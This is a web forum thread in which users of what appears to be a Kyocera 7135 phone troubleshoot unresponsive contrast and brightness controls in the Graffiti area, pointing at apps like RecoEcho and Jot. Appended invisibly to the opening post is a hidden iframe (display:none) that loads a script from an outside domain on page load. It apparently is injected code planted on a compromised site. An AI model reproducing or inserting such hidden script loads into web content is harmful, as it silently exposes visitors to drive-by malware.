+ Reply to Thread
Results 1 to 11 of 11
  1. #1
    Registered User
    Join Date
    11-28-2002
    Location
    USA
    Posts
    108

    Contrast and brightness controls on graffiti

    I am unable to bring up the brightness and contrast controls from the two dots in upper left and upper right corners of the graffiti screen. i can only bring up these controls from general preferences. is anyone else having the same problem?

    thanks. i just got this phone and dealing with several bugs.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Do you use RecoEcho or Any kind of Graffiti type Hack or App?

    Markito had been having the same problem for a while. owever, At the last lil MN Kyo-Krazy gathering at the Mall of America, Markito, Coolcat & I figured this out. When he beamed Rechoecho to Coolcat I asked Coolcat if he was having the same problem.....sure enough he did!! So I suggested he disable RecoEcho and It went away! At the time those two had 7135s and I didn't but now I can solve problems on my own unit!!

    Hope this works for you -- We need to email the makers of Recoecho to make a 7135-version!
    iPhone therefore iAm.

  3. #3
    Registered User
    Join Date
    11-28-2002
    Location
    USA
    Posts
    108
    No, i have no hacks installed or any graffiti substitute. thanks for the suggestion though. i'm reluctant to do a hard reset to see if it solves the problem, but i may have to.

  4. #4
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Have you tried re-running the digitizer? Perhaps when it first asked you to tap on the top of the graffiti area, it messed up, and those buttons are mapped to somewhere off the screen. (In Prefs PDA, you would drop down the right top menu, and choose Digitizer.)

  5. #5
    Registered User
    Join Date
    11-28-2002
    Location
    USA
    Posts
    108
    Yes, I've tried this. In fact, I have found that every time I do, or the system does, a soft reset, it brings back the digitizer screen and you have no choice but to digitize the screen and graffiti areas again before returning the OS to normal function. Is this the same with everyone else?

  6. #6
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Yes, this is normal. It is possible to turn this feature off (there's a 'Don't Show Again' button on the last setup screen), but it's also possible to get stuck unable to digitize or tap on areas of the screen if exactly the wrong set of circumstances happens; so for myself, I usually just leave it on and tap through it.

  7. #7
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    Originally posted by turboCat
    Yes, this is normal. It is possible to turn this feature off (there's a 'Don't Show Again' button on the last setup screen), but it's also possible to get stuck unable to digitize or tap on areas of the screen if exactly the wrong set of circumstances happens; so for myself, I usually just leave it on and tap through it.
    If you turn this off, Where can you Turn it back on again ?

  8. #8
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    By the way, I use Jot and I also have the same exact problem and once I turn off Jot, I then can access those two options.

  9. #9
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Originally posted by babacksh
    If you turn this off, Where can you Turn it back on again ?
    If you run the Welcome app in the System folder, go through the taps, and don't tell it 'Don't Show Again', it should start showing it again on soft resets.

  10. #10
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Jeremy
    No, i have no hacks installed or any graffiti substitute. thanks for the suggestion though. i'm reluctant to do a hard reset to see if it solves the problem, but i may have to.
    Hard resets used to concern me.... but ever since I got Backup Buddy VFS I know that I'm always just a few minutes away from being back up and running

    In any case, if you've only had the thing for a few days then why not just get it over with so you can try to rule out your problem being a hardware issue?
    Please visit my picture site: Robert-O-Rama :)

  11. #11
    Converged Dentite Krazman's Avatar
    Join Date
    04-02-2003
    Posts
    207
    I have also been having that problem, specifically the contrast dot on the graffiti area. No problem with the brightness dot though.

    Now that you mentioned it, I am running Jot, but not RecoEcho.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts